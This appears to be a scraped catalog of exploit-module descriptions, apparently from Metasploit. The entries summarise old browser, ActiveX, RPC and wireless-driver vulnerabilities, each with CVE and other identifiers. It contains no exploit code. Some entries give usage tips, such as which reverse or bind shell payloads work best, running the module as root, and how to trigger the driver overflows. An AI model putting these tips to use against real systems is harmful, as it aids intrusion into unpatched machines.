This module exploits a flaw in the Web Start plugin component of Sun Java Web Start. The arguments passed to Java Web Start are not properly validated. By passing the lesser known -J option, an attacker can pass arbitrary options directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed by Ruben Santamarta, an attacker can execute arbitrary code in the context of an unsuspecting browser user. This vulnerability was originally discovered independently by both Ruben Santamarta and Tavis Ormandy. Tavis reported that all versions since version 6 Update 10 "are believed to be affected by this vulnerability." In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.
CVE-2010-0886
OSVDB-63648
BID-39346
http://archives.neohapsis.com...
http://www.reversemode.com/in...
Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in the JuniperSetupDLL.dll library which is called by the JuniperSetup.ocx ActiveX control, as part of the Juniper SSL-VPN (IVE) appliance. By specifying an overly long string to the ProductName object parameter, the stack is overwritten.
CVE-2006-2086
OSVDB-25001
BID-17712
http://archives.neohapsis.com...
Kazaa Altnet Download Manager ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in the Altnet Download Manager ActiveX Control (amd4.dll) bundled with Kazaa Media Desktop 3.2.7. By sending a overly long string to the "Install()" method, an attacker may be able to execute arbitrary code.
CVE-2007-5217
OSVDB-37785
http://secunia.com/advisories...
Logitech VideoCall ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in the Logitech VideoCall ActiveX Control (wcamxmp.dll 2.0.3470.448). By sending a overly long string to the "Start()" method, an attacker may be able to execute arbitrary code.
CVE-2007-2918
OSVDB-36820
BID-24254
iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When sending an overly long string to the URL() property an attacker may be able to execute arbitrary code.
CVE-2008-4384
OSVDB-48946
US-CERT-VU-848873
BID-31604
Macrovision InstallShield Update Service Buffer Overflow
This module exploits a stack buffer overflow in Macrovision InstallShield Update Service(Isusweb.dll 6.0.100.54472). By passing an overly long ProductCode string to the DownloadAndExecute method, an attacker may be able to execute arbitrary code.
CVE-2007-5660
OSVDB-38347
http://lists.grok.org.uk/pipe...
Macrovision InstallShield Update Service ActiveX Unsafe Method
This module allows attackers to execute code via an unsafe methods in Macrovision InstallShield 2008.
CVE-2007-5660
OSVDB-38347
BID-26280
McAfee Subscription Manager Stack Buffer Overflow
This module exploits a flaw in the McAfee Subscription Manager ActiveX control. Due to an unsafe use of vsprintf, it is possible to trigger a stack buffer overflow by passing a large string to one of the COM-exposed routines, such as IsAppExpired. This vulnerability was discovered by Karl Lynn of eEye.
CVE-2006-3961
OSVDB-27698
BID-19265
http://lists.grok.org.uk/pipe...
McAfee Visual Trace ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in the McAfee Visual Trace 3.25 ActiveX Control (NeoTraceExplorer.dll 1.0.0.1). By sending a overly long string to the "TraceTarget()" method, an attacker may be able to execute arbitrary code.
CVE-2006-6707
OSVDB-32399
http://secunia.com/advisories...
mIRC IRC URL Buffer Overflow
This module exploits a stack buffer overflow in mIRC 6.1. By submitting an overly long and specially crafted URL to the 'irc' protocol, an attacker can overwrite the buffer and control program execution.
CVE-2003-1336
OSVDB-2665
BID-8819
MS03-020 Internet Explorer Object Type
This module exploits a vulnerability in Internet Explorer's handling of the OBJECT type attribute.
CVE-2003-0344
OSVDB-2967
BID-7806
MSB-MS03-020
Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
This module exploits a vulnerability in the GDI library included with Windows XP and 2003. This vulnerability uses the 'Escape' metafile function to execute arbitrary code through the SetAbortProc procedure. This module generates a random WMF record stream for each request.
CVE-2005-4560
OSVDB-21987
MSB-MS06-001
BID-16074
http://www.microsoft.com/tech...
http://wvware.sourceforge.net...
http://www.geocad.ru/new/site...
Internet Explorer createTextRange() Code Execution
This module exploits a code execution vulnerability in Microsoft Internet Explorer. Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point to a very remote, non-existent memory location. This module is the result of merging three different exploit submissions and has only been reliably tested against Windows XP SP2. This vulnerability was independently discovered by multiple parties. The heap spray method used by this exploit was pioneered by Skylined.
CVE-2006-1359
OSVDB-24050
MSB-MS06-013
BID-17196
US-CERT-VU-876678
http://secunia.com/secunia_re...
http://seclists.org/lists/bug...
http://seclists.org/lists/ful...
http://www.shog9.com/crashIE....
Internet Explorer VML Fill Method Code Execution
This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.
CVE-2006-4868
OSVDB-28946
MSB-MS06-055
BID-20096
Internet Explorer WebViewFolderIcon setSlice() Overflow
This module exploits a flaw in the WebViewFolderIcon ActiveX control included with Windows 2000, Windows XP, and Windows 2003. This flaw was published during the Month of Browser Bugs project (MoBB #18).
CVE-2006-3730
OSVDB-27110
MSB-MS06-057
BID-19030
http://browserfun.blogspot.co...
Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability
This module exploits a heap overflow vulnerability in the KeyFrame method of the direct animation ActiveX control. This is a port of the exploit implemented by Alexander Sotirov.
CVE-2006-4777
OSVDB-28842
BID-20047
MSB-MS06-067
https://www.blackhat.com/pres...
Internet Explorer XML Core Services HTTP Request Handling
This module exploits a code execution vulnerability in Microsoft XML Core Services which exists in the XMLHTTP ActiveX control. This module is the modifed version of http://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successfully tested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6 + Microsoft XML Core Services 4.0 SP2.
CVE-2006-5745
OSVDB-29425
MSB-MS06-071
BID-20915
Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
This module exploits a buffer overflow vulnerability in the LoadAniIcon() function in USER32.dll. The flaw can be triggered through Internet Explorer 6 and 7 by using the CURSOR style sheet directive to load a malicious .ANI file. The module can also exploit Mozilla Firefox by using a UNC path in a moz-icon URL and serving the .ANI file over WebDAV. The vulnerable code in USER32.dll will catch any exceptions that occur while the invalid cursor is loaded, causing the exploit to silently fail when the wrong target has been chosen. This vulnerability was discovered by Alexander Sotirov of Determina and was rediscovered, in the wild, by McAfee.
CVE-2007-0038
OSVDB-33629
BID-23194
MSB-MS07-017
http://www.microsoft.com/tech...
http://www.determina.com/secu...
Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download
This module allows remote attackers to place arbitrary files on a users file system via the Microsoft Office Snapshot Viewer ActiveX Control.
CVE-2008-2463
OSVDB-46749
MSB-MS08-041
BID-30114
Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
This module exploits a stack buffer overflow in Windows Media Encoder 9. When sending an overly long string to the GetDetailsString() method of wmex.dll an attacker may be able to execute arbitrary code.
CVE-2008-3008
OSVDB-47962
BID-31065
MSB-MS08-053
Microsoft Visual Studio Msmask32.ocx ActiveX Buffer Overflow.
This module exploits a stack buffer overflow in Microsoft's Visual Studio 6.0. When passing a specially crafted string to the Mask parameter of the Msmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary code.
CVE-2008-3704
OSVDB-47475
BID-30674
MSB-MS08-070
Internet Explorer Data Binding Memory Corruption
This module exploits a vulnerability in the data binding feature of Internet Explorer. In order to execute code reliably, this module uses the .NET DLL memory technique pioneered by Alexander Sotirov and Mark Dowd. This method is used to create a fake vtable at a known location with all methods pointing to our payload. Since the .text segment of the .NET DLL is non-writable, a prefixed code stub is used to copy the payload into a new memory segment and continue execution from there.
CVE-2008-4844
OSVDB-50622
BID-32721
MSB-MS08-078
http://www.microsoft.com/tech...
http://taossa.com/archive/bh0...
Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption
This module exploits an error related to the CFunctionPointer function when attempting to access uninitialized memory. A remote attacker could exploit this vulnerability to corrupt memory and execute arbitrary code on the system with the privileges of the victim.
CVE-2009-0075
OSVDB-51839
MSB-MS09-002
Microsoft OWC Spreadsheet HTMLURL Buffer Overflow
This module exploits a buffer overflow in Microsoft's Office Web Components. When passing an overly long string as the "HTMLURL" parameter an attacker can execute arbitrary code.
CVE-2009-1534
OSVDB-56916
BID-35992
MSB-MS09-043
http://labs.idefense.com/inte...
Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption
This module exploits a memory corruption vulnerability within versions 10 and 11 of the Office Web Component Spreadsheet ActiveX control. This module was based on an exploit found in the wild.
CVE-2009-1136
OSVDB-55806
MSB-MS09-043
http://ahmed.obied.net/softwa...
http://www.exploit-db.com/exp...
http://www.microsoft.com/tech...
Internet Explorer Style getElementsByTagName Memory Corruption
This module exploits a vulnerability in the getElementsByTagName function as implemented within Internet Explorer.
MSB-MS09-072
CVE-2009-3672
OSVDB-50622
BID-37085
http://www.microsoft.com/tech...
http://taossa.com/archive/bh0...
Internet Explorer "Aurora" Memory Corruption
This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the "Operation Aurora" attacks that lead to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
MSB-MS10-002
CVE-2010-0249
OSVDB-61697
http://www.microsoft.com/tech...
http://wepawet.iseclab.org/vi...
Internet Explorer DHTML Behaviors Use After Free
This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer versions 6 and 7. This bug was discovered being used in-the-wild and was previously known as the "iepeers" vulnerability. The name comes from Microsoft's suggested workaround to block access to the iepeers.dll file. According to Nico Waisman, "The bug itself is when trying to persist an object using the setAttribute, which end up calling VariantChangeTypeEx with both the source and the destination being the same variant. So if you send as a variant an IDISPATCH the algorithm will try to do a VariantClear of the destination before using it. This will end up on a call to PlainRelease which deref the reference and clean the object." NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
CVE-2010-0806
OSVDB-62810
BID-38615
http://www.microsoft.com/tech...
http://www.avertlabs.com/rese...
http://eticanicomana.blogspot...
MSB-MS10-018
Internet Explorer Tabular Data Control ActiveX Memory Corruption
This module exploits a memory corruption vulnerability in the Internet Explorer Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet Explorer are vulnerable. By specifying a long value as the "DataURL" parameter to this control, it is possible to write a NUL byte outside the bounds of an array. By targeting control flow data on the stack, an attacker can execute arbitrary code.
CVE-2010-0805
OSVDB-63329
BID-39025
http://www.zerodayinitiative....
MSB-MS10-018
Internet Explorer Winhlp32.exe MsgBox Code Execution
This module exploits a code execution vulnerability that occurs when a user presses F1 on MessageBox originated from VBscript within a web page. When the user hits F1, the MessageBox help functionaility will attempt to load and use a HLP file from an SMB or WebDAV (if the WebDAV redirector is enabled) server. This particular version of the exploit implements a WebDAV server that will serve HLP file as well as a payload EXE. During testing warnings about the payload EXE being unsigned were witnessed. A future version of this module might use other methods that do not create such a warning.
CVE-2010-0483
OSVDB-62632
MSB-MS10-023
http://www.microsoft.com/tech...
http://blogs.technet.com/msrc...
http://isec.pl/vulnerabilitie...
Microsoft Help Center XSS and Command Execution
Help and Support Center is the default application provided to access online documentation for Microsoft Windows. Microsoft supports accessing help documents directly via URLs by installing a protocol handler for the scheme "hcp". Due to an error in validation of input to hcp:// combined with a local cross site scripting vulnerability and a specialized mechanism to launch the XSS trigger, arbitrary command execution can be achieved. On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it can be used to launch the exploit automatically. If IE8 and WMP11, either can be used to launch the attack, but both pop dialog boxes asking the user if execution should continue. This exploit detects if non-intrusive mechanisms are available and will use one if possible. In the case of both IE8 and WMP11, the exploit defaults to using an iframe on IE8, but is configurable by setting the DIALOGMECH option to "none" or "player".
CVE-2010-1885
OSVDB-65264
http://lock.cmpxchg8b.com/b10...
http://www.microsoft.com/tech...
MSB-MS10-042
Microsoft Windows Shell LNK Code Execution
This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.
CVE-2010-2568
OSVDB-66387
http://www.microsoft.com/tech...
Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption
This module exploits a memory corruption within the MSVidCtl component of Microsoft DirectShow (BDATuner.MPEG2TuneRequest). By loading a specially crafted GIF file, an attacker can overrun a buffer and execute arbitrary code. ClassID is now configurable via an advanced option (otherwise randomized) - I)ruid
CVE-2008-0015
OSVDB-55651
BID-35558
MSB-MS09-032
MSB-MS09-037
http://www.microsoft.com/tech...
Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Microsoft Whale Intelligent Application Gateway Whale Client. When sending an overly long string to CheckForUpdates() method of WhlMgr.dll (3.1.502.64) an attacker may be able to execute arbitrary code.
CVE-2007-2238
OSVDB-53933
http://technet.microsoft.com/...
NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow
This module exploits a stack buffer overflow in the NCTAudioFile2.Audio ActiveX Control provided by various audio applications. By sending a overly long string to the "SetFormatLikeSample()" method, an attacker may be able to execute arbitrary code.
CVE-2007-0018
OSVDB-32032
BID-22196
US-CERT-VU-292713
http://lists.grok.org.uk/pipe...
Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Norton AntiSpam 2004. When sending an overly long string to the LaunchCustomRuleWizard() method of symspam.dll (2004.1.0.147) an attacker may be able to execute arbitrary code.
CVE-2004-0363
OSVDB-6249
BID-9916
Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in the ISAlertDataCOM ActiveX Control (ISLAert.dll) provided by Symantec Norton Internet Security 2004. By sending a overly long string to the "Get()" method, an attacker may be able to execute arbitrary code.
CVE-2007-1689
OSVDB-36164
http://securityresponse.syman...
Novell iPrint Client ActiveX Control Date/Time Buffer Overflow
This module exploits a stack buffer overflow in Novell iPrint Client 5.30. When passing a specially crafted date/time string via certain parameters to ienipp.ocx an attacker can execute arbitrary code. NOTE: The "operation" variable must be set to a valid command in order to reach this vulnerability.
CVE-2009-1569
BID-37242
OSVDB-60804
http://secunia.com/advisories...
Novell iPrint Client ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Novell iPrint Client 4.26. When sending an overly long string to the ExecuteRequest() property of ienipp.ocx an attacker may be able to execute arbitrary code.
CVE-2008-0935
OSVDB-42063
BID-27939
Novell iPrint Client ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Novell iPrint Client 4.34. When sending an overly long string to the GetDriverSettings() property of ienipp.ocx an attacker may be able to execute arbitrary code.
CVE-2008-2908
OSVDB-46194
http://secunia.com/advisories...
Novell iPrint Client ActiveX Control target-frame Buffer Overflow
This module exploits a stack buffer overflow in Novell iPrint Client 5.30. When passing an overly long string via the "target-frame" parameter to ienipp.ocx an attacker can execute arbitrary code. NOTE: The "operation" variable must be set to a valid command in order to reach this vulnerability.
CVE-2009-1568
BID-37242
OSVDB-60803
http://secunia.com/advisories...
Oracle Document Capture 10g ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0). Oracle Document Capture 10g comes bundled with a third party ActiveX control emsmtp.dll (6.0.1.0). When passing a overly long string to the method "SubmitToExpress" an attacker may be able to execute arbitrary code.
CVE-2007-4607
OSVDB-38335
BID-25467
US-CERT-VU-281977
Orbit Downloader Connecting Log Creation Buffer Overflow
This module exploits a stack buffer overflow in Orbit Downloader 2.8.4. When an attacker serves up a malicious web site, abritrary code may be executed. The PAYLOAD windows/shell_bind_tcp works best.
CVE-2009-0187
OSVDB-52294
BID-33894
Persits XUpload ActiveX MakeHttpRequest Directory Traversal
This module exploits a directory traversal in Persits Software Inc's XUpload ActiveX control(version 3.0.0.3) that's included in HP LoadRunner 9.5. By passing a string containing "..\" sequences to the MakeHttpRequest method, an attacker is able to write arbitrary files to arbitrary locations on disk. Code execution occurs by writing to the All Users Startup Programs directory. You may want to combine this module with the use of multi/handler since a user would have to log for the payloda to execute.
CVE-2009-3693
OSVDB-60001
http://retrogod.altervista.or...
RealPlayer rmoc3260.dll ActiveX Control Heap Corruption
This module exploits a heap corruption vulnerability in the RealPlayer ActiveX control. By sending a specially crafted string to the 'Console' property in the rmoc3260.dll control, an attacker may be able to execute arbitrary code.
CVE-2008-1309
OSVDB-42946
BID-28157
http://secunia.com/advisories...
RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow
This module exploits a stack buffer overflow in RealOne Player V2 Gold Build 6.0.11.853 and RealPlayer 10.5 Build 6.0.12.1483. By sending an overly long string to the "Import()" method, an attacker may be able to execute arbitrary code.
CVE-2007-5601
OSVDB-41430
BID-26130
RealNetworks RealPlayer SMIL Buffer Overflow
This module exploits a stack buffer overflow in RealNetworks RealPlayer 10 and 8. By creating a URL link to a malicious SMIL file, a remote attacker could overflow a buffer and execute arbitrary code. When using this module, be sure to set the URIPATH with an extension of '.smil'. This module has been tested with RealPlayer 10 build 6.0.12.883 and RealPlayer 8 build 6.0.9.584.
CVE-2005-0455
OSVDB-14305
BID-12698
Roxio CinePlayer ActiveX Control Buffer Overflow
This module exploits a stack-based buffer overflow in SonicPlayer ActiveX control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2. By setting an overly long value to 'DiskType', an attacker can overrun a buffer and execute arbitrary code.
CVE-2007-1559
OSVDB-34779
BID-23412
SAP AG SAPgui EAI WebViewer3D Buffer Overflow
This module exploits a stack buffer overflow in Siemens Unigraphics Solutions Teamcenter Visualization EAI WebViewer3D ActiveX control that is bundled with SAPgui. When passing an overly long string the SaveViewToSessionFile() method, arbitrary code may be executed.
CVE-2007-4475
OSVDB-53066
US-CERT-VU-985449
SoftArtisans XFile FileManager ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in SoftArtisans XFile FileManager ActiveX control (SAFmgPwd.dll 2.0.5.3). When sending an overly long string to the GetDriveName() method an attacker may be able to execute arbitrary code.
CVE-2007-1682
OSVDB-47794
US-CERT-VU-914785
BID-30826
SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender. By sending an overly long string to the "AddRouteEntry()" method located in the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute arbitrary code.
CVE-2007-5603
OSVDB-39069
http://www.sec-consult.com/30...
Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute.
This module allows remote attackers to install and execute arbitrary files on a users file system via AeXNSPkgDLLib.dll (6.0.0.1418). This module was tested against Symantec Altiris Deployment Solution 6.9 sp3.
BID-36346
CVE-2009-3028
OSVDB-57893
Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Symantec Altiris Deployment Solution. When sending an overly long string to RunCmd() method of AeXNSConsoleUtilities.dll (6.0.0.1426) an attacker may be able to execute arbitrary code.
CVE-2009-3033
BID-37092
OSVDB-60496
Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute.
This module exploits a vulnerability in Symantec AppStream Client 5.x. The vulnerability is in the LaunchObj ActiveX control (launcher.dll 5.1.0.82) containing the "installAppMgr()" method. The insecure method can be exploited to download and execute arbitrary files in the context of the currently logged-on user.
CVE-2008-4388
OSVDB-51410
Symantec BackupExec Calendar Control Buffer Overflow
This module exploits a stack buffer overflow in Symantec BackupExec Calendar Control. By sending an overly long string to the "_DOWText0" property located in the pvcalendar.ocx control, an attacker may be able to execute arbitrary code.
CVE-2007-6016
OSVDB-42358
BID-26904
http://secunia.com/advisories...
Symantec ConsoleUtilities ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Symantecs ConsoleUtilities. By sending an overly long string to the "BrowseAndSaveFile()" method located in the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an attacker may be able to execute arbitrary code
CVE-2009-3031
OSVDB-59597
BID-36698
http://sotiriu.de/adv/NSOADV-...
http://www.symantec.com/busin...
Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method
This module allows attackers to execute code via an unsafe method in Husdawg, LLC. System Requirements Lab ActiveX Control (sysreqlab2.dll 2.30.0.0)
CVE-2008-4385
OSVDB-50122
US-CERT-VU-166651
Trend Micro OfficeScan Client ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the "CgiOnUpdate()" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.
CVE-2007-0325
OSVDB-33040
BID-22585
Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in the vcst_eu.dll FileTransfer Module (1.0.0.5) ActiveX control in the Tumbleweed SecureTransport suite. By sending an overly long string to the TransferFile() 'remotefile' function, an attacker may be able to execute arbitrary code.
CVE-2008-1724
OSVDB-44252
http://www.aushack.com/200708...
Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow
This module exploits a stack-based buffer overflow in Ultra Shareware's Office Control. When processing the 'HttpUpload' method, the arguments are concatenated together to form a command line to run a bundled version of cURL. If the command fails to run, a stack-based buffer overflow occurs when building the error message. This is due to the use of sprintf() without proper bounds checking. NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload into memory unmodified.
CVE-2008-3878
OSVDB-47866
BID-30861
http://www.exploit-db.com/exp...
VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow
The VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. An attacker can exploit this issue to execute arbitrary code within the context of the affected application.
CVE-2008-5492
OSVDB-49871
BID-32313
WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow
This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject ActiveX Control. If an long string is passed to the 'NewObject' method, a stack- based buffer overflow will occur when copying attacker-supplied data using the sprintf function. It is noteworthy that this vulnerability was discovered and reported by multiple independent researchers. To quote iDefense's advisory, "Before this issue was publicly reported, at least three independent security researchers had knowledge of this issue; thus, it is reasonable to believe that even more people were aware of this issue before disclosure." NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload into memory unmodified.
CVE-2008-3558
OSVDB-47344
BID-30578
http://www.exploit-db.com/exp...
http://labs.idefense.com/inte...
http://www.trapkit.de/advisor...
http://tk-blog.blogspot.com/2...
http://archives.neohapsis.com...
http://www.cisco.com/en/US/pr...
Winamp Playlist UNC Path Computer Name Overflow
This module exploits a vulnerability in the Winamp media player. This flaw is triggered when a audio file path is specified, inside a playlist, that consists of a UNC path with a long computer name. This module delivers the playlist via the browser. This module has only been successfully tested on Winamp 5.11 and 5.12.
CVE-2006-0476
OSVDB-22789
BID-16410
Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow
This module exploits a stack buffer overflow in Winamp 5.24. By sending an overly long artist tag, a remote attacker may be able to execute arbitrary code. This vulnerability can be exploited from the browser or the winamp client itself.
CVE-2008-0065
OSVDB-41707
BID-27344
WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in IASystemInfo.dll ActiveX control in InterVideo WinDVD 7. By sending a overly long string to the "ApplicationType()" property, an attacker may be able to execute arbitrary code.
CVE-2007-0348
OSVDB-34315
BID-23071
WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow
The FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61) could allow a remote attacker to execute arbitrary code on the system. The control contains several unsafe methods and is marked safe for scripting and safe for initialization. A remote attacker could exploit this vulnerability to execute arbitrary code on the victim system. WinZip 10.0 <= Build 6667 are vulnerable.
CVE-2006-5198
OSVDB-30433
BID-21060
XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow
This module exploits a stack buffer overflow in XMPlay 3.3.0.4. The vulnerability is caused due to a boundary error within the parsing of playlists containing an overly long file name. This module uses the ASX file format.
CVE-2006-6063
OSVDB-30537
BID-21206
http://secunia.com/advisories...
Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in the Yahoo! Messenger ActiveX Control (YVerInfo.dll <= 2006.8.24.1). By sending a overly long string to the "fvCom()" method from a yahoo.com domain, an attacker may be able to execute arbitrary code.
CVE-2007-4515
OSVDB-37739
BID-25494
http://labs.idefense.com/inte...
Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX Control (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249. By sending a overly long string to the "Server()" method, and then calling the "Send()" method, an attacker may be able to execute arbitrary code. Using the payloads "windows/shell_bind_tcp" and "windows/shell_reverse_tcp" yield for the best results.
CVE-2007-3147
OSVDB-37082
http://lists.grok.org.uk/pipe...
Zenturi ProgramChecker ActiveX Control Arbitrary File Download.
This module allows remote attackers to place arbitrary files on a users file system via the Zenturi ProgramChecker sasatl.dll (1.5.0.531) ActiveX Control.
CVE-2007-2987
OSVDB-36715
BID-24217
Microsoft RPC DCOM Interface Overflow
This module exploits a stack buffer overflow in the RPCSS service, this vulnerability was originally found by the Last Stage of Delirium research group and has been widely exploited ever since. This module can exploit the English versions of Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)
CVE-2003-0352
OSVDB-2100
MSB-MS03-026
BID-8205
Microsoft Message Queueing Service Path Overflow
This module exploits a stack buffer overflow in the RPC interface to the Microsoft Message Queueing service. The offset to the return address changes based on the length of the system hostname, so this must be provided via the 'HNAME' option. Much thanks to snort.org and Jean-Baptiste Marchand's excellent MSRPC website.
CVE-2005-0059
OSVDB-15458
MSB-MS05-017
BID-13112
Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)
This module exploits a stack buffer overflow in the RPC interface of the Microsoft DNS service. The vulnerability is triggered when a long zone name parameter is supplied that contains escaped octal strings. This module is capable of bypassing NX/DEP protection on Windows 2003 SP1/SP2.
CVE-2007-1748
OSVDB-34100
MSB-MS07-029
http://www.microsoft.com/tech...
Microsoft Message Queueing Service DNS Name Path Overflow
This module exploits a stack buffer overflow in the RPC interface to the Microsoft Message Queueing service. This exploit requires the target system to have been configured with a DNS name and for that name to be supplied in the 'DNAME' option. This name does not need to be served by a valid DNS server, only configured on the target machine.
CVE-2007-3039
OSVDB-39123
MSB-MS07-065
Broadcom Wireless Driver Probe Response SSID Overflow
This module exploits a stack buffer overflow in the Broadcom Wireless driver that allows remote code execution in kernel mode by sending a 802.11 probe response that contains a long SSID. The target MAC address must be provided to use this exploit. The two cards tested fell into the 00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.
CVE-2006-5882
OSVDB-30294
http://projects.info-pull.com...
D-Link DWL-G132 Wireless Driver Beacon Rates Overflow
This module exploits a stack buffer overflow in the A5AGU.SYS driver provided with the D-Link DWL-G132 USB wireless adapter. This stack buffer overflow allows remote code execution in kernel mode. The stack buffer overflow is triggered when a 802.11 Beacon frame is received that contains a long Rates information element. This exploit was tested with version 1.0.1.41 of the A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340 adapter and appear to resolve this flaw, but D-Link does not offer an updated driver for the DWL-G132. Since this vulnerability is exploited via beacon frames, all cards within range of the attack will be affected. The tested adapter used a MAC address in the range of 00:11:95:f2:XX:XX. Vulnerable clients will need to have their card in a non-associated state for this exploit to work. The easiest way to reproduce this bug is by starting the exploit and then accessing the Windows wireless network browser and forcing it to refresh. D-Link was NOT contacted about this flaw. A search of the SecurityFocus database indicates that D-Link has not provided an official patch or solution for any of the seven flaws listed at the time of writing: (BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689). As of November 17th, 2006, D-Link has fixed the flaw it the latest version of the DWL-G132 driver (v1.21). This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.
CVE-2006-6055
OSVDB-30296
http://projects.info-pull.com...
ftp://ftp.dlink.com/Wireless/...
NetGear WG111v2 Wireless Driver Long Beacon Overflow
This module exploits a stack buffer overflow in the NetGear WG111v2 wireless device driver. This stack buffer overflow allows remote code execution in kernel mode. The stack buffer overflow is triggered when a 802.11 Beacon frame is received that contains more than 1100 bytes worth of information elements. This exploit was tested with version 5.1213.6.316 of the WG111v2.SYS driver and a NetGear WG111v2 USB adapter. Since this vulnerability is exploited via beacon frames, all cards within range of the attack will be affected. The tested adapter used a MAC address in the range of 00:18:4d:02:XX:XX. Vulnerable clients will need to have their card in a non-associated state for this exploit to work. The easiest way to reproduce this bug is by starting the exploit and then unplugging and reinserting the USB card. The exploit can take up to a minute to execute the payload, depending on system activity. NetGear was NOT contacted about this flaw. A search of the SecurityFocus database indicates that NetGear has not provided an official patch or solution for any of the thirty flaws listed at the time of writing. This list includes BIDs: 1010, 3876, 4024, 4111, 5036, 5667, 5830, 5943, 5940, 6807, 7267, 7270, 7371, 7367, 9194, 10404, 10459, 10585, 10935, 11580, 11634, 12447, 15816, 16837, 16835, 19468, and 19973. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.
CVE-2006-5972
OSVDB-30473
http://projects.info-pull.com...
Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
